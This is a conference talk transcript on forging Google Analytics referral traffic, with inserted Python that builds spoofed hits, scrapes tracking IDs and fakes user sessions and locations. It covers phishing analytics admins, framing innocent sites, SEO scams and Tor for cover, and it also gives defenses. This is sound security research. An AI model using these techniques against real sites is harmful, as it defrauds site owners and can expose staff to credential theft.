The next speaker is Tyler Rosonke. His theme is social engineering with web analytics. Just a little background on Tyler here. He's a security consultant and a penetration tester for TrustFoundry, a Midwest-based security firm. He enjoys researching new technologies, studying them, understanding them, and identifying how an adversary could abuse them. So let's give him our attention, thanks. Hi everyone, thanks for sticking around. So my name's Tyler Rosonke. Like you said, I'm based out of Omaha, Nebraska. A little bit about me before I get going. I graduated from the University of Nebraska at Omaha with a degree in information assurance. From there I started with a Fortune 200 company and did some red teaming stuff. And from there, I'm now a security consultant slash penetration tester with TrustFoundry. I run a blog at zonksec.com, and when I'm not doing computer stuff, I like doing photography, videography, and other things. So a little disclaimer here: this presentation is for information and educational purposes only. Neither I nor my employers are responsible for any trouble you get yourself into with this stuff. So use at your own risk. So before we talk about social engineering with web analytics, we should talk about what web analytics is. A formal definition is the measurement, collection, analysis, and reporting of web data. What that really means is website operators use analytics on their website to track how users are getting there, what they're doing while they're there, maybe what browser they're in, all that sort of information, and then it gets aggregated and they can paint pictures of what their users are doing. This is important because it helps website owners build better content, build better products, make decisions, and I'm sure you guys can think of reasons why that's useful. By far the top platform is Google Analytics. Although others exist, they're few and far between in my experience.
So for the purpose of this talk, we're pretty much gonna be focusing on Google Analytics. So this all started a while ago. I run analytics on my blog and I started seeing strange referrals. I saw stuff like free traffic, social buttons, big money online, and all these other scammy sites. And clearly these sites aren't actually referring traffic to my site. So I started thinking, well, what's going on? That doesn't seem legitimate. And being a penetration tester and red team kind of person, that got me wondering how I could do this, and how I could do this for evil. And so being the red team and penetration testing guy, I immediately start thinking of those applications, which to me, if I can get a link or a domain in front of somebody, I want them to go there and I'm gonna have an exploit waiting there or something. So it's sort of like phishing with Google Analytics, was the initial idea. And so I thought that idea out a little bit more, and this is sort of the scenario. I would do open source intelligence gathering on the target; I would understand what the target does, what their business is, who their customers are. And then I would try and buy a domain that I think their analytics admin would go to. And an important distinction here is that although the analytics was probably set up by a technology person, they probably handed it off to a business person or a marketing person to use that data. So we gotta keep that in mind, that it's a marketing or business person. And then we also have to think about the context of what our link actually is: it's gonna be showing up as referrals, as if our site is sending traffic to the target site. So whatever domain we pick and choose, it has to make sense that it would be sending traffic there.
So for example, if our target was a retail company, maybe buying a domain that looked like a consumer review site would be a good one, because it has reasons to be sending traffic to that retail company. And the business admin person would probably be interested in what that review site is saying about their site. And then there's some other examples there. So after we do that, we're gonna take that domain and point it to an attacker-controlled site where maybe we have a browser exploit, or a cross-site request forgery vulnerability on the target site, or maybe just a credential harvest. So if the target site had some sort of login, and they go to my domain and it presents a login that looks like something they're familiar with and they log into it, you can steal their credentials. So after we have that all set up, we're gonna start spoofing referrals just like those scams did. And hopefully our link will show up in front of the admin, percolate its way up through the analytics portal, they click it, profit. So that idea made sense. After I kind of thought it out, I was like, okay, this seems possible. So how are those spammers doing it? And to understand that, I should probably figure out how analytics works. So from a high level, this is what it is. A user will go to a site wanting content, the server will respond with that content, and inside that content will be some JavaScript that's telling the browser, hey, collect some information about your user, collect some information about where they came from, maybe what links they're clicking, and then send that off to our analytics server. And then that server collects all that information, ties it all together, and presents it to website operators so they can see what the users are doing. So that's the high level. The low level is this. This is the exact JavaScript that Google Analytics gives you and tells you to put on all the pages you want to be tracked.
The two important things to note here: first, this isn't the full script; it's actually pulling in more, and probably all of the juicy details are in there. And secondly, there's this string, the UA dash something something something. This is actually the tracking ID, which is like the core component of how analytics works. This ID is the unique identifier. All of Google Analytics' requests are going to a singular endpoint, so Google needs a way to say what data belongs to who, and this unique identifier is the way it does that. And so that becomes very important later on. So if we can look at that JavaScript and figure out the request it's making to that analytics server, we could probably start figuring out how it works and maybe do it ourselves. So I saw two paths: I can either reverse engineer the JavaScript, or I can proxy the browser, catch that request, and try to understand what it's doing. So let's take a look at that big JavaScript it was pulling in and see if we can figure it out. That doesn't look like much fun. So on second thought, let's not mess with the JavaScript and do something else. And that's when a third option sort of presented itself, and that was that Google just has amazing documentation about how it works. And here's a quick snapshot of all their required parameters. You probably can't read it, but it's not that important. So you may be wondering why Google provides this information. I can't say for certain, but I have a pretty good assumption, and that is because of the way it works: the page has to be reloaded for that information to be sent, since the JavaScript we showed only runs when the page is loaded. And the way the web is going, we have these single page applications where the page loads once and then has lots of JavaScript to pull in data and redraw the UI, and the page never reloads, which would break analytics.
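The documentation he's describing is Google's Measurement Protocol, which spells out the parameters a hit needs. As a rough sketch of the idea (the tracking ID and URLs below are placeholders, and the exact client-ID format Google expects is a detail this glosses over), a spoofed pageview with a fake referrer could be built like this:

```python
import random
import urllib.parse

COLLECT_ENDPOINT = "https://www.google-analytics.com/collect"

def build_spoofed_hit(tracking_id, target_url, fake_referrer):
    """Build a Measurement Protocol pageview URL that claims a fake referral."""
    params = {
        "v": "1",                # Measurement Protocol version
        "tid": tracking_id,      # the target site's UA- tracking ID
        "cid": str(random.randint(10**9, 10**10 - 1)),  # random client ID per fake "user"
        "t": "pageview",         # hit type
        "dl": target_url,        # the page the fake user supposedly landed on
        "dr": fake_referrer,     # the spoofed referring site
    }
    return COLLECT_ENDPOINT + "?" + urllib.parse.urlencode(params)

hit = build_spoofed_hit("UA-000000-1", "https://example.com/", "https://fake-referrer.example/")
# Requesting this URL (e.g. with urllib.request.urlopen) would record the fake session.
```

The takeaway is that nothing in the request proves a browser was ever involved; anyone who knows the tracking ID can post hits.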
And so those sites would lose that granularity. So I assume that Google made all this information public so that these developers can get that granularity back. So with that documentation, we can open up Burp Suite or any other tool that can make requests. And we build out a request, and you can see here that I made a request that made it look like traffic was coming from a fake domain. I sent the request off, the server responded with some stuff, and I logged into my portal, and sure enough, it made it look like somebody was on my site from fake domain. And that's not true; no one was there. So effectively what's happening is this: we're able to post directly to the analytics server and give it falsified information, and the activities we're saying happened never actually happened. So that sort of proved the idea: we can make it look like traffic's coming from sites that aren't actually sending traffic, we can set up those domains, and that whole scenario I talked about earlier is viable. And so I went ahead and made some tools. For the first version, I wrote a script called Google Analytics Attack and got it added to the Social-Engineer Toolkit. So if you have Kali Linux, it has the Social-Engineer Toolkit, and you actually have this previous version of the tool. And this is the menu, how you get to it. When the script is running, the bread and butter of it is the automatic mode, which you give two links. You give it the link of the target site, which is the site you wanna fake a bunch of traffic to, and then the referral site, which is the site you wanna make it look like lots of traffic is coming from. So that would be your target site and your juicy attacker domain.
And then the script will automatically make a request to the target site, grab that tracking ID, that unique identifier, and some other metadata to make the request work, fire it off, and there you go: you're starting to make it look like fake traffic is showing up. And something interesting that happened is there's the CID, which stands for client ID. Sorry, it's really small. That's like a unique identifier for a user. And if we don't randomize that parameter, if it's just a static thing, it looks like the same user is going to the site over and over and over, and that doesn't really make it look like lots of traffic. So you have to randomize that. That was something I found later on. So I made that script and I actually blogged about it a little bit, and I sort of had my reservations about it because it seemed kind of far out there and it wasn't doing anything crazy technical, but I did it anyway and it was fun and I enjoyed it. But then this article came out. And two things happened because of that. The first of which, it validated me, and I was like, awesome, that's a thing. And the second thing, it made me think there's more here. I was so focused on red team and penetration testing applications that I failed to consider anything else. And so that made me wonder what else could happen, and to think about that, I had to understand how analytics is used, because I use it in a very specific way, but I'm sure there's other people that use it differently. So that means I need to go talk to other people who use this in the field, in the real world, and understand that, and that might bring some enlightenment. So that's exactly what I did. I met up with various contacts I have in various industries and talked about, hey, how do you guys use analytics and what do you think about this? And we had some discussions and some interesting ideas came out of it. But first, before we get into those scenarios, we came up with a common theme.
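The "grab the tracking ID" step boils down to fetching the target page and pulling the UA- string out of the inline snippet. A minimal sketch, assuming the ID appears in the page source in the usual UA-XXXXXXXX-N shape (and noting, as he does later, that fetching the page this way leaves your IP in the target's logs):

```python
import re
import urllib.request

UA_RE = re.compile(r"UA-\d{4,10}-\d{1,4}")

def find_tracking_id(html):
    """Return the first UA- tracking ID found in a page's HTML, if any."""
    match = UA_RE.search(html)
    return match.group(0) if match else None

def tracking_id_of(url):
    """Fetch a page and scrape its tracking ID (this request is attributable to you)."""
    with urllib.request.urlopen(url) as resp:
        return find_tracking_id(resp.read().decode("utf-8", errors="replace"))

page = "<script>ga('create', 'UA-12345678-1', 'auto');</script>"
print(find_tracking_id(page))  # UA-12345678-1
```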
I mean, if you're in here, you probably understand what social engineering is, so I'm not gonna spend too much time on it, and you probably know more than I do, I'm just some pentester guy. But we know that humans love validation and reinforcement, and that is a very strong form of persuasion. And if we think about that in the context of analytics, we can see something: analytics traffic is kind of like a validation and a reinforcement of a website. If you're getting views, if you're getting hits, there's people out there that think your site is good. So if that's true and we can control analytics, there might be some interesting things. It may mean that we can influence any decisions that are made on analytics, and it may mean we can manipulate any sort of measurement where analytics is the measuring stick. So with that, I'll jump into some of the scenarios that I came up with. So the first one's sort of content control. Websites make content, and if they have a particular type of content A and a particular type of content B, and content B is getting lots of analytics traffic and seems really popular and content A not so much, they're probably gonna make more of content B. And if you could apply that sort of across the board, you can maybe shift what kind of content is being made, and therefore you can maybe reinforce certain political ideas, social ideas. Your imaginations are good too, so you can think of different things that could happen. But also the reverse is kind of possible: if we send traffic that looks to be coming from nefarious or antithetical sites, we could maybe discourage content.
So if I have a website that's all about how cats are great, and I see a bunch of referrals coming to my cat site from a site that says dogs are great, that may trigger some self-consciousness: maybe they're making fun of me, or it may make me feel like a minority, like no one else cares about cats anymore, and I might stop making that content. And the nefarious version is just sending traffic to these sites that comes from dark places of the web that are not so good, and that might discourage someone as well. Another scenario that I came up with was e-commerce control. So if I'm running an e-commerce site and I have some products on the site, and a particular product's receiving lots of traffic but no one's buying it (and the main reason people don't buy stuff is because it's too expensive), I may think the price is too high and make that product go on sale, or maybe drop the price. So that would be a form of interesting control as well. And e-commerce sites also sometimes will talk about new features that are coming out for their products. If they propose feature A and feature B, and we reinforce the idea that feature A is good, they will make feature A faster and better and maybe forget about feature B. So there's some more control. Another scenario that was interesting was some web development espionage. So there's lots of web development companies, and there's lots of clients that trust these web development companies to handle their entire online presence, and these companies are probably using analytics and sharing it with their customers, because their customers need to make decisions with it.
If there's a web development company who's a competitor, they may be interested in ruining that client relationship, and they could potentially do it by bombarding the analytics with traffic. You would overflow it in such a way that you can no longer tell what's real and what's fake, and that would ruin their ability to have that insight. And because the client is trusting their web development company, they may become disgruntled: we can't use this anymore, what happened? And that may cause them to leave. Additionally, if the client is seeing lots of referrals from, again, antithetical and nefarious sites, they may say, what the heck? Why are we getting all of these referrals from gambling and pornography sites? That's not cool, we trusted you, and we're gonna leave. Or if they have a particular sort of customer they're trying to reach and they're receiving lots of traffic from the opposite type of customer, the antithetical customer, again they may become disgruntled and leave. The next scenario is kind of out there, so I'm gonna ask you to put on your tinfoil hats with me. But if we can assume that a nation state was able to subpoena the analytics data and have a mass data set, we could maybe assume that that nation state is using the analytics to identify suspicious websites and operators. Maybe they're looking for terrorist organizations or child pornography rings or any of that stuff. There are organizations that would be interested in identifying and stopping these things. And so if they're using analytics to do that and we can control what analytics sees, if we can identify already known bad sites and refer traffic from those bad sites to innocent sites, we may kick off an investigation or maybe frame these innocent sites.
Additionally, the inverse is sort of possible, where if we're bad guys and we have lots of bad guys coming to our site, if we can muddy the water there and send lots of good traffic, it may make it difficult to see what's actually going on and act like a cloak. The next scenario kind of goes back to the main thing that kicked all of this off, which was scammy online stuff. And to talk about this one, the first thing we have to mention is that SEO is actually not affected by analytics. SEO is search engine optimization. It's basically techniques to increase your position on Google, and your rank in other search engines too. Analytics doesn't play any factor in that, according to Google. Google has come out and said, hey, not everyone uses analytics, so it's not fair if we use that to decide rank; we keep that out of the playing field. But people don't necessarily understand that. Additionally, analytics traffic isn't real. People don't understand that either. And so with those two fallacies at play, there are a lot of scams that are possible. Maybe I come to your company and I say, hi, I'm an SEO ninja and I can help your site get a lot more traffic and you should pay me. Or maybe I say, hey, don't pay me anything up front, no risk; if it happens, you owe me this much per this increase. And then if we can control the analytics, we can make those things happen and you get paid. If we can control geographical attributes of analytics, so we can make it look like users are coming from specific spots, there's also some SEO things you can do there too. Maybe I come to your company and say, hey, I don't think you're doing very well on the east coast. I can get you more users from the east coast. You should pay me money. And again, that can happen. And then the oldest one is people buy traffic all the time.
And so if they're using Google Analytics as their measuring stick to say whether traffic is coming to their site or not, that could be manipulated. And this stuff exists. Here's an example of people buying 25,000 hits on Fiverr for five bucks. So not a lot of money, but it's out there. An interesting thing that came out of this is not only do the good guys use analytics, but bad guys use it too. Domainers and ad fraud networks and malware networks have been identified to be using analytics. Because just like the good guys, they need to know where their users, in this case victims, are coming from, because that helps them choose where they go next and set up new systems. Which actually is interesting, because it has become a form of attribution. If we have two known bad sites and they have the same tracking ID, we can assume that the same operators are behind both domains. So what could be done here is, again, if we can ruin the integrity of their analytics data, that might hurt their ability to operate. So with all this new stuff, the old tooling's just not good enough anymore. So I built a new tool, and this is the first time I've shown it to a crowd, so it's actually gonna be released today: Google Analytics Attack NG. And to talk about what's new with it, I need to talk about how the old one failed. And the biggest thing it did wrong was user emulation. With the old tool, it looked like users showed up on the target site and then disappeared. They didn't click on anything, they didn't go anywhere else. And that made an incredibly high bounce rate. If you know anything about websites, you know what the bounce rate is: a bounce rate of 100% means people showed up on your site and then left without clicking around, which isn't a good thing; you wanna try and retain users. So because of that, it made the users look not legitimate.
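That attribution trick is easy to sketch: if two pages embed the same UA- ID, they report into the same analytics property, so they likely share an operator. A crude check along those lines (this helper is illustrative, not part of the talk's tooling):

```python
import re

UA_RE = re.compile(r"UA-\d{4,10}-\d{1,4}")

def same_operator(html_a, html_b):
    """Crude attribution: do two pages embed a common UA- tracking ID?"""
    ids_a = set(UA_RE.findall(html_a))
    ids_b = set(UA_RE.findall(html_b))
    return bool(ids_a & ids_b)

site_a = "<script>ga('create', 'UA-99999999-2', 'auto');</script>"
site_b = "<script>ga('create', 'UA-99999999-2', 'auto');</script>"
print(same_operator(site_a, site_b))  # True
```

Researchers have used exactly this kind of shared-ID pivot to cluster malicious domains, which is why polluting an operator's analytics cuts both ways.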
And so for these more sophisticated attacks, we needed to make the users look real. Because all of the requests to analytics were previously coming from whatever IP the script was running on, it all looked like the same geographical location, because Google uses the IP to decide where traffic's coming from. So it made it look like all the users are coming from one spot. Again, not a good way to make it look like real users. And with the IP address stuff, if that's the attacker IP and that's your attacker machine, that's bad operational security and a good way to get in trouble. So we need to make requests to Google Analytics from an IP that's not ours. And what's even worse than making requests to analytics is we were actually making a request to the target site, because we were trying to get that tracking ID. We left our IP address in the victim's logs, which is not good. And the last thing the previous version didn't do well is it failed to account for other perspectives. I was very focused on pen testing and red teaming applications, and I kind of failed to consider all of those other scenarios that I mentioned. So you may be wondering what good user emulation is, and the best way to demonstrate that is to actually peel back the analytics portal and show you what it looks like. So this is a screen cap from Google Analytics, and it shows where the users are going when they land on your site. And this is an example of bad user emulation, because the users show up and they drop off. They don't click anywhere, except the one on the bottom where the user clicked to one page. But overall, this demonstrates bad user emulation. What good user emulation looks like is they land on your page and then they click around. They go to other pages and they interact with the site. But that's sort of a slippery slope too, because if all these users showed up and they went to like 10 pages, normal users don't do that.
They don't click to 10 pages; on average it's low. So there's kind of give and take there. In the next view, the main columns we're interested in are the bounce rate, the pages per session, and the average session duration; between those three metrics you can decide what the users were doing. So the row that's most interesting, well, there's a few we're gonna look at, but number four, which is github.com, is actual legitimate traffic that came to my blog. 86% of those users bounced away. That means they came to my site and they left. But a handful of them stuck around, and when they did, on average they visited 1.3 pages and were there for a minute and five seconds. Those are pretty good users. The one right below, lolol.com: 100% of those users bounced, meaning they came to the site and they left. They visited that one page and they were there for zero seconds. So that's a bad user, that's spam. And an example of taking it too far, like I mentioned before: if we look at row nine, githacktier.com, the bounce rate was almost 10%, which means lots of people clicked to other pages, and on average they went to almost four pages per session and were there for 47 seconds. That's an example of taking it too far. Users don't interact that much. So in this new version, we wanna have better user emulation. Because better user emulation involves waiting in real time to give the impression of an actual user, we need to make the application threaded so that we can have better throughput. And we need to do geographical spoofing, to protect not only the IP but to make it seem like users are coming from more than one spot. We need to do some auto URLs, which we'll talk about in a little bit. And we need to have proxy support, to use Tor and protect ourselves for better operational security.
So to do better user emulation, I kind of broke down what that means, and this is the way I organized it. A session, or one user interaction, involves three types of URLs: the referral, which is where they're coming from; the target, which is the page they're landing on; and the bounce-to URLs, which is where they go afterwards, what they bounce to and click to. And the attributes of a bounce are how many pages they bounce to and how long they're on those pages when they do. And this will come into play later when I show you the tool. So the concept of auto URLs: in some of those scenarios we mentioned, it would be a good thing to be able to control specific referral URLs, specific target URLs, specific bounce URLs, and maybe have not only one but multiples of each. So sometimes you want that granularity, but sometimes you don't. Let's say I just wanna have a website receive lots of traffic, and I don't really care exactly where it's coming from, but I want it to appear to be coming from places on a certain topic. What if I did a Google search with a certain keyword that gave me lots of sites, and it looked like those sites were referring traffic? So that's kind of the idea. So for example, if we did a Google search for good hacker blogs and pointed that at my blog, that would generate a lot of traffic that would maybe reinforce, if I'm running that blog, that people are interested and that I'm doing good work. And then we can apply that same technique to grabbing target URLs and bounce URLs. So I have a quick demo to show some of the different stuff, and I'm on the con Wi-Fi, so hopefully it stays strong. It could be messing with me. So I just kicked one off, and we're gonna talk about the parameters, and then we'll talk about a little bit of the output.
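That session model (a referral URL, a target URL, a list of bounce-to URLs, and randomized dwell times between pages) can be sketched as a simple loop. The send callback here stands in for whatever actually posts the Measurement Protocol hit; the names are illustrative, not the tool's real API:

```python
import random
import time

def emulate_session(referrer, target, bounce_urls, base_delay, jitter, send):
    """Replay one fake user: land on the target with a spoofed referrer,
    then 'click' through the bounce pages with randomized dwell times."""
    cid = str(random.randint(10**9, 10**10 - 1))  # one client ID for the whole session
    send(cid=cid, page=target, referrer=referrer)
    for page in bounce_urls:
        # wait somewhere in [base_delay * (1 - jitter), base_delay] seconds
        time.sleep(base_delay * (1 - jitter * random.random()))
        send(cid=cid, page=page, referrer=target)

hits = []
emulate_session(
    referrer="https://fake-referrer.example/",
    target="https://example.com/",
    bounce_urls=["https://example.com/post-1", "https://example.com/post-2"],
    base_delay=0.01, jitter=1.0,  # tiny delay just for demonstration
    send=lambda **hit: hits.append(hit),
)
print(len(hits))  # 3 pageviews: the landing plus two bounces
```

Keeping one client ID across the whole session is what makes the portal show pages-per-session above 1 instead of three unrelated one-page visits.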
So the script is in referral mode and we're gonna send traffic to zonksec.com, which is my blog, and we're gonna make it look like traffic is coming from defconniscancel.com, and these users are going to bounce to two other pages while on my site, and we're gonna add a delay of about 60 seconds so they spend some time there. If all of the users were waiting exactly 60 seconds, that wouldn't be good, because that would be a way to determine that the traffic's false. So I introduced the idea of jitter, which, if you've used tools that have it, is basically a way to insert some randomness into the delay. With the jitter being 1, these users will wait somewhere between zero and 60 seconds. If the jitter was 0.5, they would wait somewhere between 30 and 60 seconds. So you can kind of control the randomness. And then this number, n 10, is saying we're gonna send 10 requests, and we're gonna do it over two threads. So this has been running, and the first output says a geo list was not provided, so we're gonna randomize requests from US cities. The tool gives the ability to specify geographical locations. Google does this with what's called a criteria ID, which is used both in AdWords and in Google Analytics. It's basically: this US city has this number, this state has this number; it's just a way of representing that stuff. And because we didn't provide that, the script automatically decides we're just gonna make it look like stuff is coming from all over the US. We also didn't provide a tracking ID, so it went out and grabbed that for us. And then we told it that we wanted two bounces, so it's gonna bounce to other stuff on zonksec.com, but we didn't tell it what URLs to use. So it automatically did a Google search and grabbed other URLs on zonksec.com to bounce to. And so you can see these sessions are starting to come back.
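The geographical override rides along on the same request: the Measurement Protocol accepts a geoid parameter carrying one of those AdWords criteria IDs. A sketch of randomizing it over a small list (the specific ID values below are placeholders; the real ID-to-city mapping comes from Google's published geotargets data):

```python
import random
import urllib.parse

# a few criteria IDs to rotate through; values here are placeholders, not a
# verified mapping of real US cities
US_CITY_IDS = ["1023191", "1014221", "1013962", "1018518"]

def with_random_geo(params):
    """Add a geographical override so the hit appears to come from a random city."""
    out = dict(params)
    out["geoid"] = random.choice(US_CITY_IDS)
    return out

hit = with_random_geo({"v": "1", "tid": "UA-000000-1", "t": "pageview"})
print(urllib.parse.urlencode(hit))
```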
The first one, you can see this client ID, and it had this geographical location ID, and its behavior was: it looked like the user was referred from defconniscancel.com, and then they landed on the home page, where they sat around for 42 seconds, then clicked on to another page and were there for 24 seconds, and then another page and dropped off. And you can see all of those delays are randomized as it's going. So if we hop over to analytics and take a look at what's going on, we can see we have six users on our site, they're all coming from defconniscancel.com, and the traffic is coming from all over the place. And so I'm sort of running low on time. There's other examples I was going to show that demonstrate other capabilities, but there is more stuff here: different flags that let you control all sorts of different stuff. So I'm going to jump back into the PowerPoint. Oh, and I get to skip through all these screenshots, because the demo gods did not fail me. So, possible improvements: as you make these more granular attacks, there's a lot of command line arguments and it gets really tricky to follow. So taking in CSV configuration files would make it a lot easier. I'd love to be able to emulate social media referrals. Analytics does a lot of stuff with social media, so being able to control that would be interesting. And currently the user agent appears the same for all the users, so randomizing that would be nice. Some bonus content that I came across: because you saw analytics was loading all of that data in real time, when you start sending lots and lots and lots of data, the browser gets really slow and can sometimes crash. So I thought that was interesting, because that may be another potential scenario where you just don't even make analytics usable for them.
And then another interesting thing that came out was, if you're doing some sort of command and control for botnets, it'd be a really interesting idea for agents to send data out of networks by posting to analytics. But that's a different topic. So you may be wondering how you can prevent this from happening. The first one is user awareness: teaching your analytics admins that this is possible and that they should probably be careful about clicking links while they're in analytics. You may have noticed that this whole thing revolves around the tracking ID, and if we can get that, we can make it look like data's coming into your site. So if there was a way to protect it, that'd be useful. The idea I came up with is you don't put that JavaScript on any of your pages; instead, you have some script on the backend that's looking at server logs and then posts to analytics on those users' behalf, so their clients are never doing it. And that sort of fixes things going forward, but if for some reason you want to look backwards and see what data's real and what's not, you'd have to export all your analytics data and corroborate it with your server logs. In conclusion: analytics traffic is not real traffic, therefore it can be spoofed, and you should be really careful when clicking on things in analytics. Any decisions you make with analytics could potentially be manipulated, and any sort of measurement with analytics as the measuring stick could be manipulated as well. I will be posting the code on GitHub, and I'll probably have a user guide and these slides up on my blog in a future post. So thanks for listening, and I'll be happy to answer any questions you may have.
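That backend idea can be sketched as a log-replay script: parse each access-log line, derive a client ID server-side, and post the hit yourself, so the UA- ID never ships to browsers. This assumes a combined-format log; the field handling and the IP+user-agent client-ID derivation are illustrative choices, not a prescribed design:

```python
import hashlib
import re

# Apache/nginx "combined" log format: ip ident user [time] "request" status size "referrer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) [^"]*" \d+ \d+ "([^"]*)" "([^"]*)"'
)

def hit_from_log_line(line, tracking_id):
    """Turn one access-log line into Measurement Protocol params for a server-side post."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, path, referrer, user_agent = m.groups()
    # derive a stable client ID from IP + UA so repeat visits map to one "user"
    cid = hashlib.sha1((ip + user_agent).encode()).hexdigest()[:16]
    return {
        "v": "1", "tid": tracking_id, "cid": cid, "t": "pageview",
        "dp": path,         # document path
        "dr": referrer,     # real referrer from the log
        "uip": ip,          # IP override so geolocation still works
        "ua": user_agent,   # user-agent override
    }

line = '1.2.3.4 - - [10/Oct/2000:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326 "http://ref.example/" "Mozilla/5.0"'
hit = hit_from_log_line(line, "UA-000000-1")
```

The tradeoff he hints at holds here too: the tracking ID stays secret, but anyone who does learn it can still spoof, so this raises the bar rather than eliminating the problem.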